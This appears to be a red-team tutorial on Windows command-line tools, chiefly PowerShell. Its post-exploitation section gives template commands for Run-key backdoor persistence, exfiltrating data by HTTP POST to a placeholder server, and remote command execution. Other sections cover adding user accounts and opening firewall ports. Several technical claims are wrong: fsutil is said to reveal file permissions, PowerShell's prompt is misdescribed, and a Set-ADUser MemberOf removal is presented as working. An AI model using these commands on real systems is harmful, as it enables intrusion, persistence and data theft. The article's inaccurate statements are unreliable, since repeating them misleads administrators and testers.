As a Red Team member, you need to have a solid understanding of the command-line tools available to you on Windows systems. This article will explore the most potent command-line tools for advanced Red Team members: PowerShell, Netsh, WMIC, Tasklist, FSUTIL, and VSSAdmin.
PowerShell
PowerShell is a command-line shell and scripting language designed specifically for Windows. It is based on the .NET Framework and provides access to a wide range of Windows administration capabilities. PowerShell is often used to automate tasks but is also a powerful tool for manually performing tasks.
One of PowerShell’s main advantages is that it provides access to the Windows Management Instrumentation (WMI) framework. You can use PowerShell to perform various system administration tasks, such as managing processes, services, and users. Additionally, PowerShell provides access to the Registry and Active Directory, two critical Windows administration components.
PowerShell is often used for post-exploitation activities, as it can execute commands and scripts on a compromised system. To use PowerShell, open a command prompt and type “powershell”. This will start the PowerShell shell, which looks similar to a typical command prompt but with a different prompt (">" instead of “>_”).
One of the most useful PowerShell commands for Red Team members is
Invoke-Command. This command allows you to execute a command or script on a
remote system. For example, if you have compromised a system and want to execute
a PowerShell script on it, you can use the following command:
Invoke-Command -ComputerName <hostname> -ScriptBlock { <PowerShell script> }
This will execute the PowerShell script on the remote system. You must have administrative credentials on the remote system to use this command.
Another useful PowerShell command is Get-WmiObject. This command allows you to
retrieve information from the WMI framework. For example, you can use the
following command to retrieve a list of running processes on a system:
Get-WmiObject -Class Win32_Process
This will return a list of all running processes on the local system. The “-ComputerName” parameter can retrieve the process list from a remote system.
Using PowerShell for post-exploitation activities
One of your primary objectives as a Red Team member is to maintain access to a compromised system. PowerShell can perform post-exploitation activities, such as creating backdoors, exfiltrating data, and executing commands on a remote system.
To create a backdoor on a compromised system using PowerShell, you can use the following command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "<backdoor_name>" -Value "<backdoor_path>" -PropertyType String
This command creates a new registry value under the “Run” key that points to the backdoor executable. This ensures that the backdoor is executed every time the system is booted.
To exfiltrate data from a compromised system, you can use the following command:
Invoke-RestMethod -Uri "<server_url>" -Method Post -Body "<exfiltrated_data>"
This command sends an HTTP POST request to a server specified by the “server_url” parameter. The “exfiltrated_data” parameter contains the data to be exfiltrated.
To execute a command on a remote system using PowerShell, you can use the following command:
Invoke-Command -ComputerName "<remote_system>" -ScriptBlock { <command> }
This command executes the specified command on the remote system.
Using PowerShell for reconnaissance
PowerShell can be used for reconnaissance activities like network mapping and system enumeration. Here are some examples:
To map a network using PowerShell, you can use the following command:
Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter "IPEnabled='True'" | Select-Object IPAddress
This command retrieves the IP addresses of all network adapters currently enabled. You can use this information to map the network.
To enumerate the software installed on a system, you can use the following command:
Get-WmiObject -Class Win32_Product | Select-Object Name,Version
This command retrieves the names and versions of all software installed.
Using PowerShell to manage Active Directory
PowerShell can be used to manage Active Directory, a critical Windows administration component. Here are some examples:
To create a new user account in Active Directory, you can use the following command:
New-ADUser -Name "<user_name>" -GivenName "<given_name>" -Surname "<surname>" -UserPrincipalName "<user_principal_name>" -AccountPassword (ConvertTo-SecureString "<password>" -AsPlainText -Force)
This command creates a new user account with the specified name, given name, surname, and user principal name. The account password is specified using the “password” parameter.
To modify the group membership of a user account in Active Directory, you can use the following command:
Set-ADUser -Identity "<user_name>" -Remove @{MemberOf="<group_name>"}
This command removes the specified user account from the specified group.
Netsh
Netsh is a command-line tool for configuring and monitoring network settings on Windows systems. It provides a wide range of functionality, from configuring network adapters to managing firewall settings.
One of the most valuable commands in Netsh is netsh firewall. This command
allows you to configure the Windows Firewall, a critical component of
network security on Windows systems. For example, you can use the following
command to add an inbound rule to the firewall that allows traffic on TCP port
80:
netsh firewall add portopening TCP 80 "HTTP"
This will create a new Windows Firewall rule allowing inbound traffic on TCP port 80.
Another helpful command in Netsh is netsh interface. This command allows you to
configure network adapters on a Windows system. For example, you can use the
following command to configure the IP address and subnet mask of a network
adapter:
netsh interface ip set address "Local Area Connection" static 192.168.1.10 255.255.255.0
WMIC
The Windows Management Instrumentation Command-line (WMIC) tool is a powerful command-line interface to the Windows Management Instrumentation (WMI) framework. WMIC can perform various system administration tasks, such as managing processes, services, and users.
To view a list of running processes, you can use the following command:
wmic process get Name,ProcessId,CommandLine
This command retrieves the names, process IDs, and command lines of all running processes on the system.
To create a new user account, you can use the following command:
wmic useraccount create name="<user_name>" password="<password>"
This command creates a new user account with the specified name and password.
Tasklist
The Tasklist command-line tool allows you to view a list of running processes on a Windows system. Tasklist is similar to the “ps” command in Unix-based operating systems.
Tasklist can be used to identify malicious processes that may be running on a compromised system.
To identify these processes, you can use the following command:
tasklist /v /fi "imagename eq <process_name>"
This command retrieves detailed information about the process using the specified name. By analyzing the output, you can identify whether the process is malicious.
FSUTIL
The FSUTIL command-line tool allows you to manage file systems and volumes on a Windows system. It can perform tasks such as creating and deleting file systems, compressing and decompressing files, and managing file permissions.
FSUTIL can be used to manage file permissions on a Windows system. To view the permissions of a file, you can use the following command:
fsutil usn readdata "<file_path>"
This command retrieves the specified file’s USN journal data, which includes information about the file’s permissions.
To modify the permissions of a file, you can use the following command:
icacls "<file_path>" /grant <user_name>:<permission>
This command grants the specified user permission to access the file.
VSSAdmin
The VSSAdmin command-line tool allows you to manage the Volume Shadow Copy Service (VSS) on a Windows system. VSS is a built-in Windows service enabling you to create backup copies of files and system states.
VSSAdmin can be used to create and manage VSS snapshots. To create a new snapshot, you can use the following command:
vssadmin create shadow /for="<volume>"
This command creates a new VSS snapshot of the specified volume.
To list all existing VSS snapshots, you can use the following command:
vssadmin list shadows
This command retrieves a list of all VSS snapshots created on the system.
Conclusion
As a Red Team member, you must have a solid understanding of the command-line tools available to you on Windows systems. PowerShell, Netsh, WMIC, Tasklist, FSUTIL, and VSSAdmin are some of the most powerful tools for advanced Red Team members.
PowerShell is the most versatile and widely used tool. It provides access to the Windows Management Instrumentation (WMI) framework, the Registry, and Active Directory. PowerShell is often used for post-exploitation activities, such as creating backdoors, exfiltrating data, and executing commands on a remote system.
Netsh is a powerful tool for configuring and monitoring network settings on Windows systems. It provides a wide range of functionality, from configuring network adapters to managing firewall settings.
WMIC is a powerful tool for managing processes, services, and users on a Windows system. WMIC provides access to the Windows Management Instrumentation (WMI) framework, allowing you to perform various system administration tasks.
Tasklist is a tool for viewing a list of running processes on a Windows system. Tasklist is particularly useful for identifying malicious processes running on a compromised system.
FSUTIL is a tool for managing file systems and volumes on a Windows system. FSUTIL provides a wide range of functionality, from creating and deleting file systems to managing file permissions.
VSSAdmin is a tool for managing the Volume Shadow Copy Service (VSS) on a Windows system. It allows you to create and manage VSS snapshots, which are used to create backup copies of files and system states.
By understanding how to use these tools effectively, Red Team members can perform various system administration tasks, from managing users and network settings to identifying and removing malicious processes. These tools are essential for any Red Team member who wants to be successful in their work.